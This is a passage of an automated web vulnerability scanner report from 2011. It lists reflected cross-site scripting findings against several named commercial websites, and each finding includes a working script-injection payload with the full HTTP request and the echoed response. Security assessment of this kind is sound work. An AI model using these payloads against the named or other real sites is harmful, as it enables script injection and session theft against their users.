Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CID request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /combinedsearch.aspx?CID={DC57DACD-A16B-4256-A027-9992DC9603F1}2e4bb%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ef31a24abb&OID=2179&AID=3&FID=43 HTTP/1.1
Host: www.golffacility.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golflink.com/golf-courses/golf-tee-times/teetime.aspx?course=1701056
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 115302
Vary: Accept-Encoding
Connection: Keep-Alive


<!doctype html public "-//w3c//dtd html 4.0 transitional//en" >
<html>
   <head>
       <title>Online Tee Times</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta c
...[SNIP]...
<a href="details.aspx?SD=7f60da7a-c535-4a30-91b2-26f91ee7a340&CID={DC57DACD-A16B-4256-A027-9992DC9603F1}2e4bb"style="x:expression(alert(1))"8ef31a24abb&OID=2179&TM=1817&M=3&TID=78908795&FID=43&GCID=162&TType=DISC">
...[SNIP]...

2.165. http://www.incorp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.incorp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4175a"style%3d"x%3aexpression(alert(1))"5f84b168e30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4175a"style="x:expression(alert(1))"5f84b168e30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?4175a"style%3d"x%3aexpression(alert(1))"5f84b168e30=1 HTTP/1.1
Host: www.incorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=4&c2=273
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Fri, 30 Sep 2011 13:18:28 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 92346


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title id="ttlMain">Registered Agent / Resident Agent Service - National Registered Agents</title>

<meta id="mtaGoogleVerification" name="ve
...[SNIP]...
e.com/index.cfm?fuseaction=login.simpleform&featureName=postToV3&dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253A%252F%252Fhttp://www.incorp.com/default.aspx?4175a"style="x:expression(alert(1))"5f84b168e30=1">
...[SNIP]...

2.166. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mongoosemetrics.com
Path:   /correlation/json_find_correlation_number.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 75bbb--><script>alert(1)</script>81f6aea10a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /correlation75bbb--><script>alert(1)</script>81f6aea10a3/json_find_correlation_number.php?keyword=&source=www.mcafeesecure.com&adcampaign=&callback=visitorID&fullquery=&GUID=&UUID=&SUID=&campaign=32085391297cdabe32e9c6c0af6344b7&ref=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D4%26c2%3D273&q=&or=&jsonp=mm_tCMtfCkSVkqJLRvbpwzl HTTP/1.1
Host: www.mongoosemetrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.registeredagent.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=www1

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:20:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41778
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><!-- Ins
...[SNIP]...
<input name="lead_url_c" type="hidden" id="lead_url_c" value="/correlation75bbb--><script>alert(1)</script>81f6aea10a3/json_find_correlation_number.php?keyword=&source=www.mcafeesecure.com&adcampaign=&callback=visitorID&fullquery=&GUID=&UUID=&SUID=&campaign=32085391297cdabe32e9c6c0af6344b7&ref=http%3A%2F%2Fwww.mcafees
...[SNIP]...

2.167. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mongoosemetrics.com
Path:   /correlation/json_find_correlation_number.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ef1f7--><script>alert(1)</script>3092dab99b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /correlation/json_find_correlation_number.phpef1f7--><script>alert(1)</script>3092dab99b8?keyword=&source=www.mcafeesecure.com&adcampaign=&callback=visitorID&fullquery=&GUID=&UUID=&SUID=&campaign=32085391297cdabe32e9c6c0af6344b7&ref=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D4%26c2%3D273&q=&or=&jsonp=mm_tCMtfCkSVkqJLRvbpwzl HTTP/1.1
Host: www.mongoosemetrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.registeredagent.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=www1

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:20:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 41778
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="eng" lang="eng"><!-- Ins
...[SNIP]...
<input name="lead_url_c" type="hidden" id="lead_url_c" value="/correlation/json_find_correlation_number.phpef1f7--><script>alert(1)</script>3092dab99b8?keyword=&source=www.mcafeesecure.com&adcampaign=&callback=visitorID&fullquery=&GUID=&UUID=&SUID=&campaign=32085391297cdabe32e9c6c0af6344b7&ref=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fm
...[SNIP]...

2.168. http://www.mongoosemetrics.com/correlation/json_find_correlation_number.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mongoosemetrics.com
Path:   /correlation/json_find_correlation_number.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload feb04<script>alert(1)</script>c5eba393b20 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /correlation/json_find_correlation_number.php?keyword=&source=www.mcafeesecure.com&adcampaign=&callback=visitorIDfeb04<script>alert(1)</script>c5eba393b20&fullquery=&GUID=&UUID=&SUID=&campaign=32085391297cdabe32e9c6c0af6344b7&ref=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D4%26c2%3D273&q=&or=&jsonp=mm_tCMtfCkSVkqJLRvbpwzl HTTP/1.1
Host: www.mongoosemetrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.registeredagent.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=www1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:20:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 194
Connection: close
Content-Type: application/javascript

visitorIDfeb04<script>alert(1)</script>c5eba393b20({"corelate_number":-1,"interval":"720","unique_cookie":"d41d8cd98f00b204e9800998ecf8427e","promo_code":null,"master":"","SUID":1,"search":""});

2.169. http://www.pcmemorystore.com/Glossaryws.asmx/js [__svcPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcmemorystore.com
Path:   /Glossaryws.asmx/js

Issue detail

The value of the __svcPath request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad694"%3balert(1)//5206983c362 was submitted in the __svcPath parameter. This input was echoed as ad694";alert(1)//5206983c362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Glossaryws.asmx/js?__svcPath=http%3a%2f%2fwww.pcmemorystore.com%2fGlossaryws.asmxad694"%3balert(1)//5206983c362 HTTP/1.1
Host: www.pcmemorystore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.pcmemorystore.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ru224euie0zwrq2ott1l2x45

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 258

var Glossaryws=new function() {
this.path = "http://www.pcmemorystore.com/Glossaryws.asmxad694";alert(1)//5206983c362";
this.appPath = "http://www.pcmemorystore.com//";
var cm=Sys.Net.ServiceMethod.createProxyMethod;
cm(this,"GetDefinition","Word");
}

2.170. http://www.pettravelcenter.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pettravelcenter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8ef7<a>cca48b91416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?d8ef7<a>cca48b91416=1 HTTP/1.1
Host: www.pettravelcenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:04:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Content-Length: 70
Connection: close
Content-Type: text/html

The URI you submitted has disallowed characters: d8ef7<a>cca48b91416=1

2.171. http://www.pettravelcenter.com/page_items/itemList/78 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pettravelcenter.com
Path:   /page_items/itemList/78

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef5a"><script>alert(1)</script>9d657ca93f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page_items/itemList/78?2ef5a"><script>alert(1)</script>9d657ca93f0=1 HTTP/1.1
Host: www.pettravelcenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:13:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
v id="printable_version_button" style="display:table-cell; vertical-align:middle; font-size:9px; cursor:pointer; position:absolute; right:5px; top:-15px;" onclick="window.open('/page_items/itemList/78?2ef5a"><script>alert(1)</script>9d657ca93f0=1?printable=1');">
...[SNIP]...

2.172. http://www.pettravelcenter.com/page_items/viewSingle/23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pettravelcenter.com
Path:   /page_items/viewSingle/23

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76660"><script>alert(1)</script>2b53883b0d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page_items/viewSingle/23?76660"><script>alert(1)</script>2b53883b0d4=1 HTTP/1.1
Host: www.pettravelcenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 48135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
id="printable_version_button" style="display:table-cell; vertical-align:middle; font-size:9px; cursor:pointer; position:absolute; right:5px; top:-15px;" onclick="window.open('/page_items/viewSingle/23?76660"><script>alert(1)</script>2b53883b0d4=1?printable=1');">
...[SNIP]...

2.173. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planswift.com
Path:   /images/graphics/zoomout.cur

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c92f<script>alert(1)</script>fc90fa16138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images6c92f<script>alert(1)</script>fc90fa16138/graphics/zoomout.cur HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.planswift.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:00 GMT
Server: Apache/2.2.20
Content-Length: 69
Content-Type: text/html

/images6c92f<script>alert(1)</script>fc90fa16138/graphics/zoomout.cur

2.174. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planswift.com
Path:   /images/graphics/zoomout.cur

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fbedf<script>alert(1)</script>ad578f4d262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/graphicsfbedf<script>alert(1)</script>ad578f4d262/zoomout.cur HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.planswift.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:02 GMT
Server: Apache/2.2.20
Content-Length: 69
Content-Type: text/html

/images/graphicsfbedf<script>alert(1)</script>ad578f4d262/zoomout.cur

2.175. http://www.planswift.com/images/graphics/zoomout.cur [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.planswift.com
Path:   /images/graphics/zoomout.cur

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27508<a>62fafc29679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/graphics/zoomout.cur27508<a>62fafc29679 HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.planswift.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:03 GMT
Server: Apache/2.2.20
Content-Length: 47
Content-Type: text/html

/images/graphics/zoomout.cur27508<a>62fafc29679

2.176. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planswift.com
Path:   /templates/PlanSwift_Template/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 567b7<script>alert(1)</script>87fd9f8abd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates567b7<script>alert(1)</script>87fd9f8abd6/PlanSwift_Template/favicon.ico HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:06 GMT
Server: Apache/2.2.20
Content-Length: 82
Content-Type: text/html

/templates567b7<script>alert(1)</script>87fd9f8abd6/PlanSwift_Template/favicon.ico

2.177. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planswift.com
Path:   /templates/PlanSwift_Template/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 644a0<script>alert(1)</script>2d5a936df57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/PlanSwift_Template644a0<script>alert(1)</script>2d5a936df57/favicon.ico HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:08 GMT
Server: Apache/2.2.20
Content-Length: 82
Content-Type: text/html

/templates/PlanSwift_Template644a0<script>alert(1)</script>2d5a936df57/favicon.ico

2.178. http://www.planswift.com/templates/PlanSwift_Template/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.planswift.com
Path:   /templates/PlanSwift_Template/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 448e9<a>35f31a5fecc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /templates/PlanSwift_Template/favicon.ico448e9<a>35f31a5fecc HTTP/1.1
Host: www.planswift.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 68236d4ee32ab7678c69c50cb45eafc1=1f1e3c7df635d7c3c6fd020449016e4e; WRUID=0

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:31:10 GMT
Server: Apache/2.2.20
Content-Length: 60
Content-Type: text/html

/templates/PlanSwift_Template/favicon.ico448e9<a>35f31a5fecc

2.179. http://www.sayutracking.co.uk/landing.js [client_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sayutracking.co.uk
Path:   /landing.js

Issue detail

The value of the client_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4970c"%3balert(1)//029099777b was submitted in the client_id parameter. This input was echoed as 4970c";alert(1)//029099777b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /landing.js?client_id=38034970c"%3balert(1)//029099777b HTTP/1.1
Host: www.sayutracking.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fireandsafetycentre.co.uk/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:27:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Wed, 28 Sep 2011 13:27:18 GMT
Last-Modified: Fri, 30 Sep 2011 13:27:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21107


   var userAgent = navigator.userAgent.toLowerCase();
   var isIE = ((userAgent.indexOf("msie") != -1) && (userAgent.indexOf("opera") == -1) && (userAgent.indexOf("webtv") == -1));
   var sayuHiddenObjects = new Array();
var clientId = "38034970c";alert(1)//029099777b";
var clickFD = 0;
var clickAdMax = 5;
var clickDisplay = "css";
var fraudCSS = "<div id=\"fraud_win_shadow\" style=\"z-index: 900; filter: alpha(opacity=60); left: 0px; top: 0px; width: 100%; height:
...[SNIP]...

2.180. http://www.staydublin.com/results.php [adults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the adults request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83537"><script>alert(1)</script>1bd048d2213 was submitted in the adults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=183537"><script>alert(1)</script>1bd048d2213&kids=0&sleeps=7&search.x=17&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:52 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32221


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
